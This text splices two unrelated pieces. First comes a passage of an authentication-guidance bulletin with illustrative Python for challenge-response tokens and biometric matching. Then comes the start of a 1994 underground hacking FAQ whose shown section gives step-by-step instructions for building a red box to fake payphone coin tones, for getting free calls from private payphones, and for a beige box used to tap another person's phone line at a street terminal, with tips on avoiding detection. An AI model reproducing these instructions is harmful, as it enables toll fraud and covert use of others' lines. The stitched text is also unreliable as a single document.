system in place of the traditional user name and password
combination, an extra level of security is gained.  With the
challenge-response calculator, each user is given a device that
has been uniquely keyed; he cannot use someone else's device for
access.  The host system must have a process or a processor to
generate a challenge response pair for each login attempt, based
on the initially supplied user name.  Each challenge is
different, so observing a successful challenge-response exchange
gives no information for a subsequent login.  Of course, with
this system the user must memorize a PIN. 

      The hand-held password generator can be a low-cost addition
to security, but the process is slightly complicated for the
user.  He must type two separate entries into the calculator, and
then correctly read the response and type it into the computer. 
This process increases the chance for making a mistake.  

      Overall, this technology can be a useful addition to
security, but users may find some inconvenience.  Management, if
they decide to use this approach, will have to establish a plan
for integrating the technology into their IT systems.  There will
also be the administrative challenge for keying and issuing the
cards, and keeping the user database up-to-date. 

3.5  Biometrics

      Biometric authentication systems employ unique physical
characteristics (or attributes) of an individual person in order
to authenticate the person's identity.  Physical attributes
employed in biometric authentication systems include
fingerprints, hand geometry, hand-written signatures, retina
patterns and voice patterns.  Biometric authentication systems
based upon these physical attributes have been developed for
computer login applications.  

      Biometric authentication systems generally operate in the
following manner:

(1)  Prior to any authentication attempts, a user is "enrolled" by
creating a reference profile (or template) based on the desired
physical attribute.  The reference profile is usually based on
the combination of several measurements.  The resulting template
is associated with the identity of the user and stored for later
use.

(2)  When attempting to authenticate, the user enters his login
name or, alternatively, provides a card/token containing
identification information.

(3)  The user's physical attribute is then measured.

(4)  The previously stored reference profile of the physical
attribute is then compared with the measured profile of the
attribute taken from the user.  The result of the comparison is
then used to either accept or reject the user.

     Biometric systems can provide an increased level of security
for IT systems, but the technology is still less mature than
memory or smart cards.  Imperfections in biometric authentication
devices arise from technical difficulties in measuring and
profiling physical attributes as well as from the somewhat
variable nature of physical attributes.  Many physical attributes
change depending on various conditions.  For example, a person's
speech pattern may change under stressful conditions or when
suffering from a sore throat or cold.

Biometric systems are typically used in conjunction with other
authentication means in environments requiring high security.
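The four enrolment and verification steps of section 3.5, carried
through in Python as an added example; this is not code from the
bulletin and is not modelled on any particular biometric product.  The
"hand geometry" feature vectors, the per-feature tolerance floor, the
distance measure, the user names and the acceptance thresholds are all
constructed assumptions.  What the example shows is the variability
discussed above: the same user measured under changed conditions can
fall outside the tolerance (a false rejection), and loosening the
threshold to admit him moves the system toward accepting an impostor.

```python
"""Toy biometric enrolment and verification following the four steps
of section 3.5.  All feature vectors below are constructed; they are
labelled 'hand geometry' only to make the example concrete."""
import math
from statistics import mean
from typing import Dict, List, Tuple

Vector = List[float]
Profile = Dict[str, Vector]

MIN_TOLERANCE = 0.5  # assumption: a feature never demands an exact match


def enroll(measurements: List[Vector]) -> Profile:
    """Step 1: combine several measurements into one reference template.
    The template is the per-feature mean; the spread seen during
    enrolment becomes that feature's tolerance."""
    n = len(measurements[0])
    template = [mean(m[i] for m in measurements) for i in range(n)]
    spread = [max(MIN_TOLERANCE, max(abs(m[i] - template[i]) for m in measurements))
              for i in range(n)]
    return {"template": template, "spread": spread}


def distance(profile: Profile, sample: Vector) -> float:
    """Deviation of a live sample from the template, each feature scaled
    by its enrolment spread so that stable features weigh more."""
    return math.sqrt(sum(((s - t) / w) ** 2
                         for s, t, w in zip(sample, profile["template"], profile["spread"])))


def verify(db: Dict[str, Profile], user: str, sample: Vector, threshold: float) -> bool:
    """Steps 2-4: look up the claimed identity, compare the measured
    attribute with the stored profile, accept or reject."""
    profile = db.get(user)
    if profile is None:          # unknown identity: nothing to compare against
        return False
    return distance(profile, sample) <= threshold


def error_rates(db: Dict[str, Profile], user: str, genuine: List[Vector],
                impostor: List[Vector], threshold: float) -> Tuple[float, float]:
    """False-reject rate over genuine samples and false-accept rate over
    impostor samples at a given threshold; the two errors trade against
    each other as the threshold moves."""
    frr = sum(not verify(db, user, s, threshold) for s in genuine) / len(genuine)
    far = sum(verify(db, user, s, threshold) for s in impostor) / len(impostor)
    return frr, far


# Constructed enrolment data for one user: three readings of four features.
ENROLMENT = [[64.2, 88.1, 19.5, 7.1],
             [64.8, 87.6, 19.9, 7.3],
             [63.9, 88.4, 19.2, 7.0]]
DB = {"alice": enroll(ENROLMENT)}

GENUINE_NORMAL = [64.5, 88.0, 19.6, 7.2]   # same user, ordinary conditions
GENUINE_VARIED = [66.0, 89.5, 20.5, 7.5]   # same user, attribute has shifted
IMPOSTOR = [70.1, 95.3, 22.0, 8.4]         # a different person

if __name__ == "__main__":
    for thr in (2.0, 6.0):
        print(thr, error_rates(DB, "alice", [GENUINE_NORMAL, GENUINE_VARIED],
                               [IMPOSTOR], thr))
```

At a threshold of 2.0 the ordinary reading is accepted and the shifted
one rejected; at 6.0 both genuine readings pass while the impostor is
still far outside, but every such loosening narrows the margin that
separates the two populations, which is why section 4.2.2 below asks
for accuracy to be measured in the environment where the system will
actually run.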

3.6  Cryptography

    Cryptography can play many different roles in user
authentication.  Cryptographic authentication systems provide
authentication capabilities through the use of cryptographic keys
known or possessed only by authorized entities.  Cryptography
also supports authentication through its widespread use in other
authentication systems.  For example, password systems often
employ cryptography to encrypt stored password files, card/token
systems often employ cryptography to protect sensitive stored
information, and hand-held password generators often employ
cryptography to generate random, dynamic passwords.  Cryptography
is frequently used in distributed applications to convey
identification and authentication information from one system to
another over a network.

       Cryptographic authentication systems authenticate a user
based on the knowledge or possession of a cryptographic key. 
Cryptographic authentication systems can be based on either
private key cryptosystems or public key cryptosystems.  

     Private key cryptosystems use the same key for the functions
of both encryption and decryption.  Cryptographic authentication
systems based upon private key cryptosystems rely upon a shared
key between the user attempting access and the authentication
system.  

     Public key cryptosystems separate the functions of
encryption and decryption, typically using a separate key to
control each function.  Cryptographic authentication systems
based upon public key cryptosystems rely upon a key known only to
the user attempting access.  
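As an added illustration, and not code from the bulletin or from any
vendor's product, the following Python models the challenge-response
exchange of section 3.4, the on-device PIN check and attempt limit
described for smart cards in section 3.3, and the shared-key
("private key cryptosystem") form of cryptographic authentication of
section 3.6.  The device key, PIN, user name, the 7-digit challenge and
8-digit response formats, and the choice of HMAC-SHA256 as the keyed
function are all assumptions made for the example.

```python
"""Challenge-response login with a hand-held token (constructed example).

The token holds a per-device secret key and the user's PIN; the host
holds the same key for that user name.  Neither the key nor the PIN is
ever sent to the host: only a fresh challenge and its one-time response
cross the terminal.  Keyed function, formats and names are assumptions."""
import hashlib
import hmac
import secrets
from typing import Dict, Optional


def compute_response(key: bytes, challenge: str) -> str:
    """Keyed function shared by token and host (assumption: HMAC-SHA256).
    The MAC is truncated to 8 decimal digits so it fits a calculator-sized
    display and can be typed at a terminal."""
    mac = hmac.new(key, challenge.encode(), hashlib.sha256).digest()
    return "%08d" % (int.from_bytes(mac[:4], "big") % 100_000_000)


class Token:
    """The hand-held device.  It verifies the PIN itself (section 3.3),
    locks after MAX_PIN_ATTEMPTS consecutive wrong PINs, and never
    reveals its key."""
    MAX_PIN_ATTEMPTS = 3

    def __init__(self, device_key: bytes, pin: str) -> None:
        self._key = device_key
        self._pin = pin
        self.failed = 0
        self.locked = False

    def respond(self, pin: str, challenge: str) -> Optional[str]:
        """Return the response to type into the terminal, or None when
        the PIN is wrong or the token has locked itself."""
        if self.locked:
            return None
        if not hmac.compare_digest(pin.encode(), self._pin.encode()):
            self.failed += 1
            if self.failed >= self.MAX_PIN_ATTEMPTS:
                self.locked = True
            return None
        self.failed = 0
        return compute_response(self._key, challenge)


class Host:
    """The IT system.  It keeps one device key per user name and issues a
    fresh random challenge for every login attempt (section 3.4)."""

    def __init__(self) -> None:
        self._keys: Dict[str, bytes] = {}
        self._pending: Dict[str, str] = {}

    def enroll(self, user: str, device_key: bytes) -> None:
        self._keys[user] = device_key

    def challenge(self, user: str) -> str:
        # 7-digit random challenge, as in the text; a new one per attempt
        chal = "%07d" % secrets.randbelow(10_000_000)
        self._pending[user] = chal
        return chal

    def verify(self, user: str, response: str) -> bool:
        # The pending challenge is consumed whether or not the response
        # matches, so a response observed once cannot be replayed.
        chal = self._pending.pop(user, None)
        if chal is None or user not in self._keys:
            return False
        expected = compute_response(self._keys[user], chal)
        return hmac.compare_digest(expected, response)


def login(host: Host, token: Token, user: str, pin: str) -> bool:
    """The full exchange: user name -> challenge -> PIN and challenge into
    the token -> response -> host decision."""
    chal = host.challenge(user)
    response = token.respond(pin, chal)
    return response is not None and host.verify(user, response)


if __name__ == "__main__":
    key = bytes.fromhex("00112233445566778899aabbccddeeff")  # constructed
    host = Host()
    host.enroll("alice", key)
    token = Token(key, "4821")
    print("correct PIN:", login(host, token, "alice", "4821"))
    print("wrong PIN:  ", login(host, token, "alice", "0000"))
```

Two properties of the text are visible in the code: because the host
discards each challenge after one verification, a response copied from
an earlier login is useless, and because the PIN is checked inside the
token and the device locks itself, a stolen token without the PIN yields
nothing.  The 8-digit truncation exists only so the response can be read
off a small display; the host stores the key, not the responses.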

4  Issues

     In addition to the actual choice of identification and
authentication technology, there are a number of other issues
that should be addressed to ensure the overall success and
security of one's IT system.  

4.1  Networks and Applications

     With the increased use of networks connecting multiple
hosts, an average IT user may find himself logging onto several
different computers, some of them remotely through a network. 
This situation poses a number of options with respect to user
identification and authentication.  In one option, the user must
authenticate himself to each computer separately, with a possibly
different password each time.  If there is a different password
for each computer, then that user will have difficulty in
remembering them.  If one password is used for all systems, then
the compromise of the password will have more far reaching
effects.

     A more desirable situation is one in which the user need
only authenticate himself to the first computer he logs into and
that computer passes the authentication data to each of the other
computers the user then needs to access.  This scheme requires
that all of the computers on the network are capable of reliably
handling this authentication data.  Standardization efforts such
as Open System Environment (OSE), Portable Operating System
Interface (POSIX) and Government Open Systems Interconnection
Profile (GOSIP) can contribute to this goal of transparent
authentication across networks.

     Related to the issue of user authentication across different
platforms is the issue of user authentication across different
applications on the same platform.  Large applications, such as
database management systems (DBMS), frequently require that users
login to them as well as to the underlying operating system. 
This second application login is considered an unnecessary burden
by many users.  As discussed in the network context above, if
authentication data can be reliably shared between an operating
system and the applications running on it, then the task of
authenticating a user to a complex IT system becomes simpler. 

4.2  Procurement Considerations

     An organization must answer numerous questions when it
decides to implement an advanced authentication system.  The
following discussion highlights many of the issues involved in
evaluating, procuring, and integrating these systems.

4.2.1  Sources of information 

     A variety of sources should be used when evaluating
authentication systems.  Vendor product literature can be very
helpful in describing specific details of product operation,
and in understanding the range of products offered.  There are
several annual conferences devoted to computer security, network
access control, and authentication technology.  In addition to
the papers presented at these conferences, there are usually
large vendor exhibit halls and product forums.  Many
organizations, particularly those in the government sector, have
published information on the selection and integration of
advanced authentication technology.  These publications are
often the result of practical experience gained during the
implementation of these systems, and so can be particularly
useful.

4.2.2  Accuracy 

     The accuracy of an authentication system refers to the
ability of that system to correctly identify authorized system
users while rejecting unauthorized users.  Since this is the
primary function of an authentication system, accuracy is
directly related to the level of security provided by the
system.  Vendors may not be objective about producing and
interpreting the results of tests which quantify the accuracy
of the authentication process with regard to the vendor's
particular products.  For these reasons, an organization may wish
to run independent tests to determine the accuracy of an
authentication system in terms which are relevant to the
environment in which the system will be used.

4.2.3  Reliability 

     An authentication system should be capable of operating in
its intended environment for a reasonable period of time.  During
this time, the system is expected to perform at or above a level
which ensures an appropriate amount of protection for the host
system.  If the authentication system fails, the chances for
unauthorized access during the failure should be minimized.  

4.2.4  Maintainability 

     All hardware and software systems require some form of
maintenance.  The components of an authentication system should
be evaluated to determine the level of maintenance which the
system will require.  One goal in the design of an authentication
system should be to minimize the maintenance requirements within
the constraints of system cost, performance, and available
technology.

4.2.5  Commercial availability 

     Large-scale networking of computer systems and distributed
computing are relatively recent developments, and are the driving
forces behind the need for more effective methods for
authenticating system users.  Unfortunately, the market for
advanced authentication technology is not fully developed and
is somewhat unstable.  Many commercially available authentication
systems have not yet been sold in quantity.  An organization that
is considering the use of this technology should evaluate the
vendor's ability to produce systems that meet specific quality
control standards and in sufficient quantity to meet the user's
requirements.  Contracts written to procure authentication
systems should provide some form of protection for the customer
in the event that the vendor is unable to produce systems in the
quantities required.   

4.2.6  Upgradeability 

     Because the technology of advanced authentication systems is
continually developing, any authentication system should be able
to accommodate the replacement of outdated components with new
ones.  A modular approach to the design of an authentication
system, with clearly defined interfaces between the system
components, facilitates the process of upgrading to new
technology.

4.2.7  System Integration 

     The integration of an authentication system into an existing
computer environment can be very difficult.  Most operating
systems do not contain well-defined entry points for replacing
the default authentication mechanism supplied with the operating
system.  This is partly because there is no widely accepted
standard for the interface between an operating system and an
authentication device.  Until such a standard becomes available,
there are three general options: 

(1)  In some cases, the vendor who provides the authentication
system may have already integrated it into certain operating
systems.  If the authentication system meets the requirements of
the customer and the customer is using the specified operating
system, then the system integration has already been
accomplished.  

(2)  Operating system vendors may select certain security
architectures for incorporation into their systems.  If these
architectures include an authentication technology which the
customer finds acceptable, then the operating system may be
purchased with the appropriate authentication mechanism as part
of the package.

(3)  It may be necessary to customize the authentication system
and perhaps modify the host operating system so that the two can
communicate.  This will involve cooperation between the operating
system vendor, the authentication system vendor, and the
customer, unless the customer has sufficient expertise to perform
the integration in-house.  A prototyping approach is strongly
recommended, due to the complexity of this type of project. 
Implementing such a system on a small scale first can be very
helpful in determining what problems will be encountered in a
full-scale implementation. 

5    Cost

     As in other aspects of IT security, the specific cost of
enforcing Identification and Authentication should be balanced
against the value of the information processed on an IT system
and the vulnerability of that information to attack.  In general,
devices with a higher performance level will cost more, but
individual cases should be evaluated carefully. The
authentication systems described in this chapter provide a range
of cost from password-only systems at the low end to biometrics
at the high end.  Token systems, such as memory cards and smart
cards, fall inside the range.

     In assessing the cost of an authentication system there are
several issues to consider.  The first is the actual cost to
purchase and install the required equipment and software.  In
general there is no additional cost to purchase a password system
because they are included with most IT systems.  Programs that
check for good passwords, an important part of using a password
system, do cost additional money.  The use of memory cards is
quite extensive and the use of smart cards is increasing
significantly so the costs associated with these technologies
will decrease over time.  The application of biometrics is not
that extensive so costs are comparatively higher.  Managers
should keep in mind that similar products from different vendors
may vary widely in cost, depending on the vendor's manufacturing
and development techniques and marketing philosophies.    

     In addition to the cost of procuring authentication
technology, there is the cost to the organization involved in
using that technology.  This includes on-going training of staff
in the correct use of the technology as well as the training and
time of personnel to administer the authentication system.

     While the relationship between cost and performance can
appear complex for authentication technology, the general
approach should be to procure the authentication system which  
provides the required level of security and other performance
factors at a minimum cost.

6    Interdependencies

6.1  Security Management & Administration

     The incorporation of a new or improved user authentication
system will have a noticeable effect throughout an organization. 
To ensure the acceptance and success of such a program, careful
management of the change should take place throughout the
organization.

6.2  Cryptography

     Cryptography plays a role in identification and
authentication in two ways. The first is a supporting role for
each of the other forms of authentication.  Cryptography can
provide for the security of authentication data both while it is
stored in a computer and while it is being transmitted between
systems.  In addition, cryptography can be used itself as an
authentication method.

6.3  Risk Management

     A thorough analysis can be done to determine what parts of
an organization's IT system are vulnerable to a login attack, and
to prioritize these vulnerabilities in terms of severity and
likelihood.  The types of authentication technology used should
be appropriate for the risk at hand.  Not all systems may require
identification and authentication, e.g., public access systems.

6.4  Personnel

     The types of identification and authentication methods used
by an organization should be chosen in a context that includes
personnel considerations.  This will help determine what measures
will work best for an organization's employees.  It is important
to note that the cooperation of an organization's staff is every
bit as important as the technology to provide identification and
authentication.

6.5  Audit

     Identification and authentication provide the basis for
auditing in an IT system.  By tying actions of a user to a unique
identification, individuals may be held accountable for their
actions.

7   References

CSC-STD-002-85, Department of Defense Password Management
Guideline, April 12, 1985.

FIPS PUB 48, Guidelines on Evaluation of Techniques for Automated
Personal Identification, U.S. Department of Commerce, National
Bureau of Standards, Washington, D.C., April 1, 1977.

FIPS PUB 83, Guideline on User Authentication Techniques for
Computer Network Access Control, U.S. Department of Commerce,
National Bureau of Standards, Washington, D.C., September 29,
1980.

FIPS PUB 113, Computer Data Authentication, U.S. Department of
Commerce, National Bureau of Standards, Washington, D.C., May 30,
1985.

Feldmeier, David C. and Philip R. Karn, UNIX Password Security -
Ten Years Later, Crypto '89 Abstracts, Santa Barbara, CA, August
20-24, 1989.

FIPS PUB 112, Password Usage, U.S. Department of Commerce,
National Bureau of Standards, Washington, D.C., May 30, 1985.

Haykin, Martha E., and Robert B. J. Warnar, Smart Card
Technology: New Methods for Computer Access Control, NIST Special
Publication 500-157, U.S. Department of Commerce, National
Institute of Standards and Technology, Washington, D.C.,
September 1988.

Morris, R. and Thompson, K., Password Security: A Case History,
Communications of the ACM, Vol. 22, No. 11, November 1979, pp.
594-597.

Needham, R. M. and Schroeder, M. D., Using Encryption for
Authentication in Large Networks of Computers, Communications of
the ACM, Vol. 21, No. 12, December 1978, pp. 993-999.

Smid, Miles, James Dray and Robert B. J. Warnar, A Token Based
Access Control System for Computer Networks, Proceedings 12th
National Computer Security Conference, October 1989.

Steiner, J.G., Neuman, C., and Schiller, J.I., Kerberos: An
Authentication Service for Open Network Systems, Proceedings
Winter USENIX, Dallas, Texas, February 1988, pp. 191-202.

Troy, Eugene F., Security for Dial-Up Lines, NBS Special
Publication 500-137, U.S. Department of Commerce, National Bureau
of Standards, Washington, D.C., May 1986.

CCITT Recommendation X.509, The Directory - Authentication
Framework, November 1988, (Developed in collaboration, and
technically aligned, with ISO 9594-8).

ANSI X9.26-1990, American National Standard for Financial
Institution Sign-On Authentication for Wholesale Financial
Transactions, American Bankers Association, Washington, D.C.,
Approved February 28, 1990.

Sidebar Notes

(1)  Sec. 1, para 1:  The process of verifying the identity of an
IT system user is referred to as identification and
authentication.

(2)  Sec. 1, para 2:  Many new technologies offer significant
increases to the protection afforded by password-only systems.

(3)  Sec. 3.1.1, para 3:  Passwords will be more difficult to
guess or obtain illicitly when combined or misspelled words are
used and when a minimum length requirement for passwords is met.

(4)  Sec. 3.1.1, para 2:  The use of passwords as a means of
access control to IT systems can result in a proliferation of
passwords that reduces overall IT system security.

(5)  Sec 3.2, para 1:  A memory card authenticates a user's
identity based on a unique card used in conjunction with
something known to the user, such as a PIN.

(6)  Sec. 3.2, para 3:  Common types of memory cards are
telephone calling cards, credit cards, and ATM cards.

(7)  Sec. 3.3, para 1:  Smart cards, which contain one or more
integrated chips, can provide increased functionality and
increased security over memory cards. 

(8)  Sec 3.4, para 1:  A hand-held password generator is a state-
of-the-art device about the size of a shirt-pocket calculator
that is used to access an IT system in place of the traditional
user name and password.

(9)  Sec. 3.5, para 1:  Biometric authentication systems operate
based on unique physical attributes of users, such as voice
patterns, fingerprints, and hand geometry; however, the
technology is less mature than that for memory and smart cards.

(10) Sec. 3.6, para 1:  Cryptography can be the basis for an
authentication system; or it can be used in conjunction with the
other systems discussed. 

(11) Sec. 4.2.1:  In choosing an authentication system, managers
should explore information provided by vendors, at IT security
conferences and presentations, and in special publications.

(12)  Sec. 4.2.7:  Important considerations in choosing an
authentication system include accuracy, reliability,
maintainability, commercial availability, upgradeability, and
system integration.



The HAQ Edition 2.07 (June 11, 1994)

OK, it's a bit old but it *DOES* contain some valid information on UNIX
and Internet hacking... At least it's not as old as the Jolly Roger Cookbook
:), enjoy ppl

-=*( Prophet )*=-

**
Jun 13, 1994 19:54 from Belisarius

 _____________
/      /     /             ***     ***      ******       ******
      /                     ***     ***    *********    *********
     /       /               ***     ***  ***     ***  ***     ***
    /       /                 ***********  ***********  ***     ***
   /       /_____    ______    ***********  ***********  ***  ** ***
  /       /     /   /_____/     ***     ***  ***     ***  ***   *****
 /       /     /   /             ***     ***  ***     ***   ***********
/       /     /   /______         ***     ***  ***     ***   *****   ***

                          +---------------+
                          |    THE HAQ    |
                          | Edition  2.07 |
                          |  11 JUN 1994  |
                          +---------------+

                 "Knowledge is power" --Francis Bacon
              "United we stand, divided we fall" --Aesop

=+=+=+=+=+=+=+=+=+= HACK-FAQ!  Non-Copyright Notice =+=+=+=+=+=+=+=+=
=                                                                   =
+      MatrixMage Publications.       1994    No rights reserved.   +
=                                                                   =
+ This file may be redistributed provided that the file and this    +
= notice remain intact. This article may not under any              =
+ circumstances be resold or redistributed for compensation of any  +
= kind.  Distribution of THE HACK-FAQ! is encouraged and promoted.  =
+                                                                   +
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=

                        <*>  Edited by  <*>

                        # Editor-in-Chief #
               Belisarius < temporary loss of E-mail >
          can be reached on ISCA, Shadow, SkyNET, Brinta and
         Baltimore 2600 Meetings and other nameless locations.

                # Asst.  Editor (non communicado) #
               Neurophire (on Shadow and N P on ISCA)

                A MatrixMage Electronic Publication

Special Thanks to the Following Contributors:
Z Maestro     RA of ISCA Underground>
DINO          RA of Shadow Hack and Crack>
Artimage      RA of SKYNET Underground>

Faunus        Revolution        Miska               Informatik
Matrixx       Amarand           Crypto Steelyhart   aBBa / PfA
Beelzebub     Redbeard          Squarewave
IO            CyberSorceror     Caustic
Doktor Nil    Skipster          Walrus
CPT Ozone     Abort             Kyoti
Carsenio      Aero              Phrack

AND NOW A WORD FROM YOUR EDITOR:

     Throughout history mankind has been afraid of the unknown.
Before lightning could be scientifically explained it was blamed on
the anger of the gods.  This belief in mysticism persisted throughout
the ages (and still does today).  Later as man acquired simple herbal
and chemical knowledge, these men were revered as mages, users of
mystical arts derived from the old gods.  But as organized religion
(i.e. Christianity especially Roman Catholicism) spread and came to
dominate society (became the powers that be), the mage was no longer
revered.  The mage (who only sought to understand the world around
himself and make the world a better place) was persecuted, attacked
and driven underground by the church.  But driving these mages
underground (out of society) did not stop their ideas from spreading
or them from continuing to work.  The church labeled Copernicus as a
heretic and mage and only this century has the Roman Catholic church
accepted his principles (heliocentric universe) as fact.
     So are 'hackers' the same today.  We surf the nets seeking
knowledge and information (and hopefully understanding).  Information
and understanding the meaning and import of the information are the
two greatest commodities and bases of power in the world today.
These things are easy to disseminate and gather in the electronic
world.  The matrix (cyberspace/web/net [whichever term you choose])
is able to influence and control information faster and better than
ever before.  This makes many afraid of the cyberculture (not to
mention a deep-seated techno-fear of many people, anything new and
technical is bad).
     We are a new breed of mage; seeking knowledge, desiring
understanding, persecuted by the powers that be.  This is why I have
started this publication.  We are the MatrixMages!  Our mission is
to learn and to pass on that knowledge.

                                      -=> Belisarius <=-
*********************************************************************
What is 'Cyberpunk' and the Underground?

"Every time I release a phile, or write an article for a zine, it's
vaguely like a baby.  It gets stored, and copied, and sent out all
over the world, and people read it.  It goes into their minds.
Something I created is buried in living tissue and consciousness
someplace.  Eventually somebody uses it, and I know that I have the
power to change the world.  Somewhere, someplace, somebody changed
something using information I changed or created.  I helped to
change the world."  --Unknown

That is the attitude of many of the people who, knowingly or not, are
members of this hyped/wired/cyber culture.  Some who may read this
will see some of their undefined beliefs, hopes and feelings
reflected in the above quote.  And, as the quote says, they will
help spread it.  Somewhere, somehow, that quote will change the
world.

But only if you work to change it.  Remember that information and
knowledge are powerful commodities.  He who has information cannot
be beaten.  So above all the most important thing to do in the
"Underground" is to gather information.  This means that you have to
work and put in some effort.  You don't get something for nothing!
So work hard and together we can change the world!

Keep up with latest editions.  (Sorry there haven't been many lately
but exams and not failing out took precedence!)

The Haq, MatrixMage, THE HACK-FAQ!, Belisarius, Neurophyre,
or any contributor are not responsible for any consequences.
You use this information at your own risk.

*********************************************************************
                              CONTENTS
*********************************************************************
Sections
   I. Phone Fun
       (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)
  II. Fake E-Mail
       (Fooling UUCP)
 III. Social Engineering
       (Free sodas, Dumpster Diving, ATMs, Carding)
  IV. The Big Bang
       (Making Weapons and Explosives)
   V. Infection
       (Virii, Trojans, Worms and other creepy crawlies)
  VI. NEWBIES READ THIS
       (Basic Hacking)
 VII. Screwing with the most widespread operating system on the net
       (UNIX / AIX Hacking)
VIII. Screwing with the most secure operating system on the net
       (VAX/VMS Hacking)
  IX. Screwing with the most widespread operating system on PCs
       (MS-DOS Hacks)
   X. Finding out what that encrypted info is
       (Cracking programs)
  XI. How do I keep my info secure
       (PGP / Cryptology)
 XII. Chemistry 101
       (explosive/pyrotechnic component prep)
XIII. Fun things with solder, wires, and parts
       (Underground electronics)
 XIV. Watching television
       (cable, Pay-Per-View(PPV), scrambling)
  XV. Tuning in to what's on the radio waves
       (Radios and Scanning)

Appendices
   A. FTP sites with useful info
   B. Interesting Gophers
   C. Informative USENET Newsgroups
   D. Publications and Zines
   E. Books
   F. Files and Papers
   G. Catalogs
   H. PGP Keys
*********************************************************************

=====================================================================
I. Phone Fun
     (Red Boxing, COCOTS, Beige Boxing, Cellulars, etc.)

WHAT IS A RED BOX AND HOW DO I MAKE ONE?
(from Doktor Nil)

First note: a redbox is merely a device which plays the tone a
payphone makes when you insert money. You just play it through the
mike on the handset. You would think that the Phone Co. would mute
the handset until you put a quarter in, and perhaps they are starting
to build phones like that, but I have yet to see one.

What you need:
- Radio Shack 33 memory Pocket Tone Dialer
- 6.4 - 6.5536 megahertz crystal (get 6.5 MHz from Digikey, address
  below)
- A solder gun.
- Someone who can point out the crystal in the Tone
  Dialer.

Instructions:
1) Open up the back of the tone dialer. Use screwdriver.

2) Locate crystal. It should be toward the right side.
It will be smaller than the 6.5 MHz one you bought, but otherwise
vaguely similar.  It is basically capsule-shaped, with two electrodes
coming out of the bottom which are soldered onto a circuit board.
It's on the _left_ side, basically the third large crystal thing from
the bottom, about 1.5 cm long, metallic, thin.

3) De-solder, and de-attach, crystal. Heat the solder that the
crystal is seated in; remove crystal.

4) Attach 6.5 MHz crystal. It is easiest just to use the solder which
is already there from the old crystal, that way there is less chance
of you dropping hot solder somewhere it shouldn't be and losing
everything. Heat first one drop of solder with the solder gun, and
seat one electrode of the 6.4 MHz crystal in it, then do the same
with the other. This is the easiest part to mess up, be careful that
both drops of solder don't run together.

5) Put cover back on. you are done.

How to use: Five presses of the "*" key will make the quarter sound.
I think fewer presses make nickel/dime sounds, but I can't remember
specifically. Here in Michigan, you can simply hold it up to the
handset and press memory recall button 1 (where you have conveniently
recorded five *'s -read the tone dialer directions on how to do this)
and get a quarter credit, _IF_ you are calling LD. Keep making the
tone to get additional credits. There is a maximum number of credits
you can have at once.

To make a local call this may not work. You need to first put in a
real coin, then you can use the redbox for additional credits. There
may be a way around this, however: Call the operator, and ask her to
dial your number for you. She should do this without asking why, it
is a regular service. If you need an excuse, say the "4" key isn't
working, or something. She will ask you to insert your money. At
this point use the redbox. If all goes well, she dials your number
and you're in business. If she says "Will you do that one more time,"
or "Who is this," or any variations, hang up and walk away.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT DO THESE CRYSTALS LOOK LIKE?
In most cases, a rectangular metal can with two bare wires coming out
of one end, and a number like "6.50000" stamped on one side.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS THE BEST FREQUENCY FOR THE RADIO SHACK RED BOX CRYSTAL?
(from Matrixx)
6.49 is the actual EXACT crystal, 6.5 is more widely used, and 6.5536
is the easiest to find (Radio Shack)

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I GET A CRYSTAL TO MAKE THE RED BOX?
The crystals are available from Digi-Key.  Call 1-800-DIGIKEY
(1-800-344-4539) for more info.  The part order number from
DIGI-KEY is x-415-ND

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT ARE THE ACTUAL FREQUENCIES FOR REDBOX?
(from DINO)
For a Radio Shack conversion red box: a nickel is one * and a quarter
is 5 *'s

Here are the freqs for a red box:

$.25 1700 Hz & 2200 Hz for a length of 33 milliseconds for each pulse
     with 33 millisecond pause between each pulse
$.10 1700 Hz & 2200 Hz 2 pulses at 66 milliseconds and with 66
     millisecond pauses
$.05 one pulse at the above freqs for 66 milliseconds!

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW DO YOU KNOW THAT THE PHONE IS A COCOT?
(from Faunus, Carsenio)
If it doesn't say "______ Bell" on it, it's probably a COCOT.  COCOT
stands for Customer-Owned Coin-Operated Telephone: a payphone owned
by a private operator or "Bell-independent" phone company rather than
the local Bell company.  Sometimes they are more shabbily constructed
than real fortress phones, but others look about the same except for
the lack of a phone company logo.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

FOOLING COCOTS USING 800 NUMBERS?
You call up an 800 number, as any public phone has to let you dial
800 numbers for free.  Then you let the person who answers the 800
number hang up on you, THEN you dial the number that you want to
call free.  Most COCOTs disable the keypad on the phone, so you
can't just dial the number; you have to use a pocket tone dialer to
dial the number.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW DO I MAKE A BEIGE BOX?
(from Neurophyre)
Supplies: phone cord, soldering iron, solder, 2 INSULATED alligator
          clips, ratchet wrench, 7/16-inch hex head

 1. Cut the head off one end of the phone cord.
 2. Strip the coating back about two (2) inches.
 3. Look for the red wire, and the green wire.
 4. Mark one clip green and put it on the green.
 5. Mark the other red and put it on the red.
 6. Once you have them soldered and insulated, plug the other end
    (that still has the head) into a phone.
 7. Go out in the daytime and look for green bases, green rectangular
    things sticking about 3 feet out of the ground with a Bell logo on
    the front.  If you're a lamer, you'll waste your time with a
    cable company box or something.  I've heard of it.
 8. Come back to a secluded one at night.  With the wrench, open it
    up.
 9. Find a set of terminals (look like the threaded end of bolts
    in my area) with what should be a red wire and a green wire
    coming off them.
10. Plug in your beige box red to red and green to green, pick up the
    phone and dial away!

Modems work too as well as taps and shit.  You're using someone
else's line (unless you're an idiot) to get phone service.  Don't
abuse the same line after the phone bill comes.

